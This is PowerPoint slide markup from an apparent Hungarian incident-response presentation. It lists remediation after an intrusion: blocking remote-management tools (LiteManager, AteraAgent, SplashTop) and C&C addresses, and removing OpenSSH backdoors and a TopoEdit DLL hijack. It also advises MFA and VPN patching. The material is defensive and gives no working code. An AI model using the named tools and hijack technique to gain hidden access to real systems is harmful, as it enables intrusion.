                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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CADDA8F0-F65A-C2F6-6151-46F6A31EE493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028834" y="2269903"/>
            <a:ext cx="15527749" cy="7241359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="2" spcCol="540000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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4815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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RMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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 eszközök azonosítása és blokkolása</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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LiteManager</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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AteraAgent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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SplashTop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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 címek blokkolása</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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600" dirty="0" smtClean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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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C&amp;C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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PowerTrash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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600" dirty="0" smtClean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C&amp;C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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Futtatható állományok eltávolítása</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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Backd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" err="1" smtClean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oor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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-ok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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-k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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hu-HU" sz="3600" dirty="0" err="1" smtClean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Konfigok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" err="1" smtClean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stb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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…)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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TopoEdit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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tedutil.dll hijack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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ezdeti hozzáférés</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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 Fertőzött </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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eszközök</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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 VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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-en keresztül</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609630" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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 felhasználói oldal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00BBC5"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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600" dirty="0" smtClean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MFA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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bevezetés a VPN-re</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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600" dirty="0" smtClean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VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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hu-HU" sz="3600" dirty="0" err="1" smtClean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patchelése</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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 Engedélyezett </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean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RMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean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 eszközök listája</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Bold" panose="020F0702030404030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US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52537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95554A-A5D4-2EA0-5A23-FFFAF48C2A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7288" y="3"/>
            <a:ext cx="18485288" cy="103979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21D520-A7FA-33B2-B12E-A149E4482AC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7288" y="0"/>
            <a:ext cx="18485288" cy="1039797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D5E39672-FCA3-44D1-8EAA-F0208D2C76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51566" y="8787743"/>
            <a:ext cx="3753872" cy="622962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="368300">
              <a:schemeClr val="tx2">
                <a:alpha val="13000"/>
              </a:schemeClr>
            </a:glow>
          </a:effec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4E0A908F-4CA6-E2F6-8737-40B0B48B11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4214" y="3980545"/>
            <a:ext cx="11747352" cy="1803414"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="60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Incidens válasz csökkentése hónapokról pár percre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" b="1" dirty="0"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042518" y="1881129"/>
            <a:ext cx="16005676" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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hu-HU" sz="6000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Megoldás bármilyen méretű vállalat számára</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196395807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07534E38-8309-4348-817B-97EF0738D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23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66A63E9-D76E-9EF2-FE8B-D809504BA43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604310" y="7473800"/>
            <a:ext cx="1730328" cy="30716101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
